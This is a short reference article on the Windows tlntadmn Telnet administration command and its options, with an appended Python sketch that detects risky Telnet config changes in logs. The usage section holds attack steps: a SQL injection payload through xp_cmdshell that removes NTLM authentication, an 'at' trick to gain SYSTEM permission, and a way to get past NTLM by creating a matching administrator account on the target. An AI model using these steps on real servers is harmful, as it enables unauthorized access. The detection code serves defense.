Telnet provides remote login. How does an administrator manage server settings such as the port and the authentication method? This article introduces the tlntadmn command, which configures the Telnet service, including its port and authentication method:
Usage: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
Use 'all' for all sessions.
- -s sessionid: list session information.
- -k sessionid: terminate the session.
- -m sessionid: send a message to the session.
- config: configure the Telnet server parameters.
- common_options:
  - -u user: specifies the user whose credentials are to be used.
  - -p password: the user's password.
- config_options:
  - dom = domain: sets the default domain for user names.
  - ctrlakeymap = yes | no: sets the mapping of the ALT key.
  - timeout = hh:mm:ss: sets the idle session timeout value.
  - timeoutactive = yes | no: enables the idle session timeout.
  - maxfail = attempts: sets the number of failed logon attempts allowed before disconnection.
  - maxconn = connections: sets the maximum number of connections.
  - port = number: sets the Telnet port.
  - sec = [+/-]NTLM [+/-]passwd: sets the authentication mechanism.
  - fname = file: specifies the audit file name.
  - fsize = size: specifies the maximum size (MB) of the audit file.
  - mode = console | stream: specifies the operation mode.
  - auditlocation = eventlog | file | both: specifies where audit records are written.
  - audit = [+/-]user [+/-]fail [+/-]admin: specifies the events to audit.
Usage:
Run the following command: tlntadmn config sec =-ntlm
Run: ; exec master.dbo.xp_cmdshell 'tlntadmn config sec =-ntlm' -- (after the injection, NTLM authentication is removed).
- C:\> tlntadmn config sec =-ntlm (run with admin permission)
- C:\> at 20:43 /interactive "cmd" (obtain system permission using the at command)
- A new job is added. Its job ID is 1.
- C:\WINNT\system32> tlntadmn config sec =-ntlm
Another method to get around NTLM verification: create an administrator user on the target host, then create a user with the same account name and password on the local machine. Right-click CMD on the local machine, select Run as, and enter that account and password. You can then Telnet directly to the target IP address, and the session passes NTLM verification.
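
The tlntadmn config commands shown above leave a recognisable command line in process-creation or SQL audit logs. The following Python sketch is an added example, not part of the original article: it parses a tlntadmn config command line and reports changes to sec, audit and port. The function names, the finding messages and the sample log lines are assumptions constructed for illustration.

```python
import re

# Option names (sec, audit, port) are from the tlntadmn usage text on this page.
# Which changes count as findings is this example's assumption, not a vendor rule.
def parse_config(cmdline):
    """Return {option: [value tokens]} for a 'tlntadmn ... config ...' command line."""
    m = re.search(r"\btlntadmn(?:\.exe)?\b.*?\bconfig\b(.*)", cmdline, re.I)
    # Tolerate spaces around '=' ("sec =-ntlm", "sec = -ntlm").
    tail = re.sub(r"\s*=\s*", "=", m.group(1)) if m else ""
    opts, key = {}, None
    for tok in tail.split():
        tok = tok.strip("'\";").lower()
        if "=" in tok:
            key, val = tok.split("=", 1)
            opts[key] = [val]
        elif key and re.fullmatch(r"(?:[+-][a-z]+)+", tok):
            opts[key].append(tok)   # continuation such as "+passwd"
        else:
            key = None              # trailing text, e.g. a SQL "--" comment
    return opts

def toggles(values):
    """Map [+/-]name switches to their sign: ['-ntlm', '+passwd'] -> {'ntlm': '-', 'passwd': '+'}."""
    return {name: sign for sign, name in re.findall(r"([+-])([a-z]+)", " ".join(values))}

def findings(cmdline):
    """List the security-relevant Telnet server changes requested by one command line."""
    opts, out = parse_config(cmdline), []
    sec = toggles(opts.get("sec", []))
    if sec.get("ntlm") == "-":
        out.append("sec: NTLM authentication removed")
    if sec.get("passwd") == "+":
        out.append("sec: password authentication enabled")
    audit = toggles(opts.get("audit", []))
    out += [f"audit: {e} events no longer recorded" for e in ("user", "fail", "admin") if audit.get(e) == "-"]
    if "port" in opts:
        out.append(f"port: Telnet port set to {opts['port'][0]}")
    return out

# Constructed sample command lines, as they might appear in process-creation or SQL audit logs.
SAMPLES = [
    "tlntadmn config sec =-ntlm",
    "; exec master.dbo.xp_cmdshell 'tlntadmn config sec =-ntlm' --",
    "tlntadmn.exe config sec = -ntlm +passwd port = 2323 audit = -fail -admin",
    "tlntadmn -s all",
]
if __name__ == "__main__":
    for line in SAMPLES:
        print(findings(line), "<-", line)
```

Session commands such as -s produce no findings; only config changes to authentication, auditing or the port are reported.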